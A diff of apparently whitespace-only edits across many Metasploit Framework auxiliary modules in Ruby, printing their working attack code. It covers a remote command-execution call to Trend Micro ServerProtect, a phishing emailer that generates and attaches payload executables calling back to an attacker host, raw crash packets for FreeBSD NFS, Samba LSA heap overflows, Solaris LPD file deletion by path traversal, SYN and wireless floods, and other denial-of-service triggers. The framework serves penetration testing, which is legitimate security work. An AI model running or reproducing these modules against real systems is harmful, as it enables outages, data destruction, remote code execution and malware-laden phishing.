@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
return serverprotect_rpc_call(0, stub)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Call the serverprotect RPC service
|
||||
#
|
||||
#
|
||||
def serverprotect_rpc_call(opnum, data = '')
|
||||
|
||||
begin
|
||||
|
||||
|
||||
connect
|
||||
|
||||
handle = dcerpc_handle(
|
||||
@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
|
||||
outp
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Apr 28 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(12174),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
|
||||
@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
connect
|
||||
|
||||
len = 2 + datastore['CMD'].length
|
||||
|
||||
len = 2 + datastore['CMD'].length
|
||||
|
||||
data = [0x00000000].pack('V')
|
||||
data << len.chr
|
||||
data << "\x00"
|
||||
data << datastore['CMD'] + " "
|
||||
data << "\x00"
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(data)
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
if (!res)
|
||||
print_error("Did not recieve data. Failed?")
|
||||
else
|
||||
|
@ -1,6 +1,9 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Generic Emailer (SMTP)',
|
||||
'Description' => %q{
|
||||
This module can be used to automate email delivery.
|
||||
This code is based on Joshua Abraham's email script for social
|
||||
This code is based on Joshua Abraham's email script for social
|
||||
engineering.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://spl0it.org/' ],
|
||||
],
|
||||
],
|
||||
'Author' => [ 'et <et[at]metasploit.com>' ]))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
[
|
||||
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
|
||||
OptString.new('RPORT', [true, "SMTP server port",'25']),
|
||||
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
|
||||
], self.class)
|
||||
|
||||
# Hide this option from the user
|
||||
], self.class)
|
||||
|
||||
# Hide this option from the user
|
||||
deregister_options('MAILTO')
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
fileconf = File.open(datastore['YAML_CONFIG'])
|
||||
yamlconf = YAML::load(fileconf)
|
||||
|
||||
fileto = yamlconf['to']
|
||||
yamlconf = YAML::load(fileconf)
|
||||
|
||||
fileto = yamlconf['to']
|
||||
from = yamlconf['from']
|
||||
subject = yamlconf['subject']
|
||||
type = yamlconf['type']
|
||||
@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
attachment_file = yamlconf['attachment_file']
|
||||
attachment_file_type = yamlconf['attachment_file_type']
|
||||
attachment_file_name = yamlconf['attachment_file_name']
|
||||
|
||||
|
||||
### payload options ###
|
||||
make_payload = yamlconf['make_payload']
|
||||
zip_payload = yamlconf['zip_payload']
|
||||
@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
datastore['MAILFROM'] = from
|
||||
|
||||
|
||||
msg = File.open(msg_file).read
|
||||
|
||||
email_sig = File.open(sig_file).read
|
||||
|
||||
if (type !~ /text/i and type !~ /text\/html/i)
|
||||
if (type !~ /text/i and type !~ /text\/html/i)
|
||||
print_error("YAML config: #{type}")
|
||||
end
|
||||
|
||||
if make_payload
|
||||
|
||||
if make_payload
|
||||
|
||||
print_status("Creating payload...")
|
||||
system(
|
||||
"#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1")
|
||||
|
||||
if msf_change_ext
|
||||
if msf_change_ext
|
||||
msf_payload_newext = msf_filename
|
||||
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
|
||||
File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}")
|
||||
msf_filename = msf_payload_newext
|
||||
end
|
||||
|
||||
if zip_payload
|
||||
if zip_payload
|
||||
zip_file = msf_filename
|
||||
zip_file = zip_file.gsub(/\.\w+/, '.zip')
|
||||
system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1");
|
||||
msf_filename = zip_file
|
||||
attachment_file_type = 'application/zip'
|
||||
else
|
||||
else
|
||||
attachment_file_type = 'application/exe'
|
||||
end
|
||||
|
||||
@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if l !~ /\@/
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
nem = l.split(',')
|
||||
name = nem[0].split(' ')
|
||||
fname = name[0]
|
||||
lname = name[1]
|
||||
email = nem[1]
|
||||
|
||||
|
||||
if add_name
|
||||
email_msg_body = "#{fname},\n\n#{msg}"
|
||||
else
|
||||
|
||||
|
||||
if add_name
|
||||
email_msg_body = "#{fname},\n\n#{msg}"
|
||||
else
|
||||
email_msg_body = msg
|
||||
end
|
||||
|
||||
@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data_sig = File.open(sig_file).read
|
||||
email_msg_body = "#{email_msg_body}\n#{data_sig}"
|
||||
end
|
||||
|
||||
|
||||
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
|
||||
|
||||
mime_msg = Rex::MIME::Message.new
|
||||
@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mime_msg.to = email
|
||||
datastore['MAILTO'] = email.strip
|
||||
mime_msg.subject = subject
|
||||
|
||||
|
||||
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
|
||||
|
||||
|
||||
if attachment
|
||||
if attachment_file_name
|
||||
data_attachment = File.open(attachment_file).read
|
||||
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
send_message(mime_msg.to_s)
|
||||
sleep wait
|
||||
sleep wait
|
||||
end
|
||||
|
||||
|
||||
print_status("Email sent..")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the Cisco IOS
|
||||
This module triggers a Denial of Service condition in the Cisco IOS
|
||||
HTTP server. By sending a GET request for "/%%", the device becomes
|
||||
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
|
||||
tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
|
||||
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service',
|
||||
'Description' => %q{
|
||||
This module sends a specially-crafted NFS Mount request causing a
|
||||
This module sends a specially-crafted NFS Mount request causing a
|
||||
kernel panic on host running FreeBSD 6.0.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'OSVDB', '23511' ],
|
||||
[ 'CVE', '2006-0900' ],
|
||||
]))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(2049),], self.class)
|
||||
end
|
||||
|
||||
@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
|
||||
pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
|
||||
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
|
||||
|
||||
|
||||
print_status("Sending dos packet...")
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => '3Com SuperStack Switch Denial of Service',
|
||||
'Description' => %q{
|
||||
This module causes a temporary denial of service condition
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 24 2004'))
|
||||
|
||||
|
||||
register_options( [ Opt::RPORT(80) ], self.class )
|
||||
end
|
||||
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
rescue ::Errno::ECONNRESET
|
||||
print_status("DoS packet successful. #{rhost} not responding.")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer',
|
||||
'Description' => %q{
|
||||
This module triggers a use-after-free vulnerability in the Apache Software
|
||||
Foundation mod_isapi extension. In order to reach the vulnerable code, the
|
||||
Foundation mod_isapi extension. In order to reach the vulnerable code, the
|
||||
target server must have an ISAPI module installed and configured.
|
||||
|
||||
By making a request that terminates abnormally (either an aborted TCP connection or
|
||||
an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later,
|
||||
if another request comes for that ISAPI module, previously obtained pointers will
|
||||
if another request comes for that ISAPI module, previously obtained pointers will
|
||||
be used resulting in an access violation or potentially arbitrary code execution.
|
||||
|
||||
Although arbitrary code execution is theoretically possible, a real-world method of
|
||||
Although arbitrary code execution is theoretically possible, a real-world method of
|
||||
invoking this consequence has not been proven. In order to do so, one would need to
|
||||
find a situation where a particular ISAPI module loads at an image base address
|
||||
that can be re-allocated by a remote attacker.
|
||||
|
||||
Limited success was encountered using two separate ISAPI modules. In this scenario,
|
||||
a second ISAPI module was loaded into the same memory area as the previously
|
||||
a second ISAPI module was loaded into the same memory area as the previously
|
||||
unloaded module.
|
||||
},
|
||||
'Author' =>
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a heap overflow in the Dell OpenManage
|
||||
This module exploits a heap overflow in the Dell OpenManage
|
||||
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
|
||||
exists due to a boundary error within the handling of POST requests,
|
||||
where the application input is set to an overly long file name.
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'CVE', '2004-0331' ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 26 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1311),
|
||||
@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
|
||||
'Description' => %q{
|
||||
The WEBrick::HTTP::DefaultFileHandler in WEBrick in
|
||||
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Request sent to #{rhost}:#{rport}")
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_status("Couldn't connect to #{rhost}:#{rport}")
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'kris katterjohn',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
'References' => [
|
||||
[ 'CVE', '2008-5081' ],
|
||||
[ 'OSVDB', '50929' ],
|
||||
[ 'OSVDB', '50929' ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 14 2008')
|
||||
|
||||
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.id = 0xbeef
|
||||
n.l3.ttl = 128
|
||||
n.l3.flags = 2
|
||||
|
||||
|
||||
n.l4 = Racket::L4::UDP.new
|
||||
n.l4.src_port = 0
|
||||
n.l4.dst_port = datastore['RPORT'].to_i
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba lsa_io_privilege_set Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow in the LSA RPC service
|
||||
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '34699'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
pipe = datastore['SMBPIPE'].downcase
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Mac OS X: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
|
||||
|
||||
stub = lsa_open_policy(dcerpc)
|
||||
stub << NDR.long(1)
|
||||
stub << NDR.long(0xffffffff)
|
||||
stub << NDR.long(0x100)
|
||||
stub << "X" * 0x100
|
||||
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
|
||||
begin
|
||||
@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow in the LSA RPC service
|
||||
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '34699'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
pipe = datastore['SMBPIPE'].downcase
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
dcerpc.call(0x0f, stub)
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption',
|
||||
'Description' => %q{
|
||||
This is a proof of concept denial of service module for Sendmail versions
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simply delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515),
|
||||
@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
|
||||
|
||||
r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
r_user = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
r_spool = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
|
||||
|
||||
# Create a simple control file...
|
||||
control = "H#{r_hostname}\nP#{r_user}\n";
|
||||
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02#{r_hostname}:#{r_spool}\n")
|
||||
res = sock1.get_once
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||
|
||||
dataf = Rex::Text.rand_text_alpha(100)+1
|
||||
|
||||
|
||||
print_status("Deleting #{datstore['RPATH']}...")
|
||||
if !(
|
||||
send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
|
||||
@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||
sock1.close
|
||||
end
|
||||
|
||||
def send_file(s, type, name, data='')
|
||||
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => 'todb',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['BID', '37670'],
|
||||
['OSVDB', '61538'],
|
||||
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
|
||||
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
|
||||
])
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
|
||||
end
|
||||
|
||||
@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.ack = 0
|
||||
n.l4.seq = rand(0xffffffff)
|
||||
n.l4.add_option(101,"")
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
pkt = n.pack
|
||||
print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}")
|
||||
capture_sendto(pkt,rhost)
|
||||
close_pcap
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
|
||||
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
|
||||
])
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE')
|
||||
end
|
||||
|
||||
@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
while (num <= 0) or (sent < num)
|
||||
|
||||
n.l3.src_ip = srchost
|
||||
n.l3.src_ip = srchost
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = rand(128)+128
|
||||
n.l3.ttl = rand(128)+128
|
||||
n.l4.window = rand(4096)+1
|
||||
n.l4.src_port = sport
|
||||
n.l4.seq = rand(0x100000000)
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
|
@ -1,18 +1,29 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info ={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless CTS/RTS Flooder',
|
||||
'Description' => %q{
|
||||
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
|
||||
using the specified source address,
|
||||
using the specified source address,
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Brad Antoniewicz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
